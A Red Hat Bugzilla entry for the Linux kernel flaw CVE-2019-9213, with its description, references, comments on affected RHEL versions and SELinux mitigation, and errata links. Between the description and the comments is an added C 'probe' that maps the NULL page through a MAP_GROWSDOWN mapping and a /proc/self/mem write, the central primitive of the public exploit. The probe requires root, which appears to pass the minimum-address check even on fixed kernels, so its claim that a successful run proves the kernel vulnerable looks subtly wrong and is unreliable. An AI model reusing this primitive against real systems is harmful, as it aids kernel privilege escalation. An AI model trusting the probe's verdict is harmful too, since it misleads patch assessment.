Bug 1686136 (CVE-2019-9213) - CVE-2019-9213 kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms
Status: CLOSED ERRATA
Alias: CVE-2019-9213
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=important,public=20190227,repo...
Keywords: Security
Depends On: 1687667 1687668 1708832 1686137 1687669 1692205 1708829 1708830 1708831 1715342
Blocks: 1686219 1686141
Reported: 2019-03-06 19:50 UTC by msiddiqu
Modified: 2019-06-17 19:56 UTC
CC List: 29 users

A flaw was found in the Linux kernel's memory-mapping code: the stack-expansion routine expand_downwards() in mm/mmap.c did not enforce the mmap minimum address (vm.mmap_min_addr), which allows an unprivileged process to get the NULL page mapped into its address space. An attacker can use this to turn an otherwise unexploitable kernel NULL pointer dereference into a working exploit on platforms without SMAP.
Clone Of:
Last Closed: 2019-06-10 10:50:04 UTC




External Trackers
Tracker                 ID              Priority  Status  Summary  Last Updated
Red Hat Product Errata  RHSA-2019:0831  None      None    None     2019-04-23 14:30 UTC
Red Hat Product Errata  RHSA-2019:1479  None      None    None     2019-06-17 18:00 UTC
Red Hat Product Errata  RHSA-2019:1480  None      None    None     2019-06-17 19:56 UTC

Description msiddiqu 2019-03-06 19:50:54 UTC
In the Linux kernel before 4.20.14, expand_downwards in mm/mmap.c lacks a check for the mmap minimum address, which makes it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task.

An upstream patch:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a1d52994d440e21def1c2174932410b4f2a98a1

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1792

https://seclists.org/oss-sec/2019/q1/166
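
A check for the behaviour described above, added here as an example; it is not code from the bug report, from the upstream kernel or from Red Hat. It assumes a Linux host and that it is run as root: the pre-fix check, which the CVE text calls a "capability check for the wrong task", is assumed to pass for a task holding CAP_SYS_RAWIO, so an unprivileged run is refused on vulnerable and fixed kernels alike and proves nothing. The helper names parse_mmap_min_addr, growsdown_base and probe_growsdown_to_null are its own. It places a MAP_GROWSDOWN mapping at the lowest address vm.mmap_min_addr permits and then writes to address 0 through /proc/self/mem, which makes the kernel grow that mapping downward through expand_downwards() with the writer's credentials; a kernel that enforces the minimum address refuses the write, a kernel missing the check ends up with the NULL page mapped.

```c
/*
 * Probe for the CVE-2019-9213 stack-expansion check.  Added example; not
 * code from the bug report, the kernel or Red Hat.  Assumes Linux, a
 * kernel that honours MAP_GROWSDOWN, and a caller holding CAP_SYS_RAWIO
 * (run as root): the pre-fix check is assumed to be a capability check on
 * the current task, so an unprivileged run is refused on every kernel.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Parse the contents of /proc/sys/vm/mmap_min_addr.  Returns -1 on junk. */
long parse_mmap_min_addr(const char *text)
{
    char *end;
    errno = 0;
    unsigned long v = strtoul(text, &end, 10);
    if (end == text || errno != 0 || (*end != '\0' && *end != '\n'))
        return -1;
    return (long)v;
}

/* Lowest page-aligned address at or above min_addr.  The MAP_GROWSDOWN
 * mapping is placed here so that mmap() itself is permitted and nothing
 * lies between the mapping and page 0. */
unsigned long growsdown_base(unsigned long min_addr, unsigned long page)
{
    return (min_addr + page - 1) & ~(page - 1);
}

/* Returns 1 if a write through /proc/self/mem grew the mapping down to
 * page 0 (the minimum-address check on the expansion path is missing),
 * 0 if the kernel refused, 2 if the probe could not be set up. */
int probe_growsdown_to_null(unsigned long min_addr)
{
    unsigned long page = (unsigned long)sysconf(_SC_PAGESIZE);
    unsigned long base = growsdown_base(min_addr, page);
    char byte = 0x41, back = 0;
    ssize_t n;
    int fd, saved;

    if (base == 0) {
        fputs("mmap_min_addr is 0: page 0 is mappable directly, nothing to probe\n", stderr);
        return 2;
    }
    void *m = mmap((void *)base, page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_GROWSDOWN, -1, 0);
    if (m == MAP_FAILED) {
        perror("mmap MAP_GROWSDOWN at mmap_min_addr");
        return 2;
    }
    fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) {
        perror("open /proc/self/mem");
        munmap(m, page);
        return 2;
    }
    /* A write below vm_start of a VM_GROWSDOWN vma reaches the kernel's
     * stack-expansion code (expand_downwards) with the writer's creds. */
    n = pwrite(fd, &byte, 1, 0);
    saved = errno;
    if (n == 1 && pread(fd, &back, 1, 0) == 1 && back == byte) {
        close(fd);
        munmap((void *)0, base + page);   /* mapping now spans [0, base + page) */
        return 1;
    }
    close(fd);
    munmap(m, page);
    fprintf(stderr, "write at address 0 refused (%s): minimum address enforced on the expansion path\n",
            n < 0 ? strerror(saved) : "short write");
    return 0;
}

int main(void)
{
    char buf[64] = {0};
    FILE *f = fopen("/proc/sys/vm/mmap_min_addr", "r");
    if (!f || !fgets(buf, sizeof buf, f)) {
        perror("/proc/sys/vm/mmap_min_addr");
        return 2;
    }
    fclose(f);
    long min_addr = parse_mmap_min_addr(buf);
    if (min_addr < 0) {
        fprintf(stderr, "unparseable mmap_min_addr: %s\n", buf);
        return 2;
    }
    int r = probe_growsdown_to_null((unsigned long)min_addr);
    printf("vm.mmap_min_addr=%ld -> %s\n", min_addr,
           r == 1 ? "NULL page mapped via MAP_GROWSDOWN expansion (check missing)"
         : r == 0 ? "expansion below mmap_min_addr refused"
                  : "probe not run");
    return r;
}
```

Read a refusal carefully: on a host with SELinux enforcing it may be the SELinux mitigation the comments below describe rather than a patched kernel, and on kernels that never carried the commit the comments name (Red Hat Enterprise Linux 6 and 7) the expansion into the lowest region fails for a different reason. Confirm the fix through the errata or kernel version rather than from the probe alone; only the success case, the NULL page becoming mapped, is conclusive.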

Comment 1 msiddiqu 2019-03-06 19:51:11 UTC
Created kernel tracking bugs for this issue:

Affects: fedora-all [bug 1686137]

Comment 6 Wade Mealing 2019-03-12 03:49:15 UTC
Bit of a public update since people have been asking:

The reproducer (and the theory) fails on both Red Hat Enterprise Linux 6 and 7.  The commit which introduced this flaw is 32e4e6d5cbb0c0e427391635991fe65e17797af8 and it needs to be present to be exploited correctly.

At this time this commit does not exist in Red Hat Enterprise Linux 6 and 7.

This commit however IS present in the kernel-alt (ARM kernel) for rhel-7 based on 4.10.  However, for the exploit to work correctly SELinux must be disabled.  Other security mitigation technology will assist in mitigating this flaw from being useful (such as PXN (SMEP like) and PAN (SMAP like)), but these are not considered an "absolute" defense; attackers may be able to work around these protection mechanisms.

Comment 8 Wade Mealing 2019-03-12 06:04:50 UTC
Mitigation:

Enabling SELinux prevents the public exploit from working correctly.

Comment 14 errata-xmlrpc 2019-04-23 14:30:32 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2019:0831 https://access.redhat.com/errata/RHSA-2019:0831

Comment 16 errata-xmlrpc 2019-06-17 18:00:01 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2019:1479 https://access.redhat.com/errata/RHSA-2019:1479

Comment 17 errata-xmlrpc 2019-06-17 19:56:03 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2019:1480 https://access.redhat.com/errata/RHSA-2019:1480

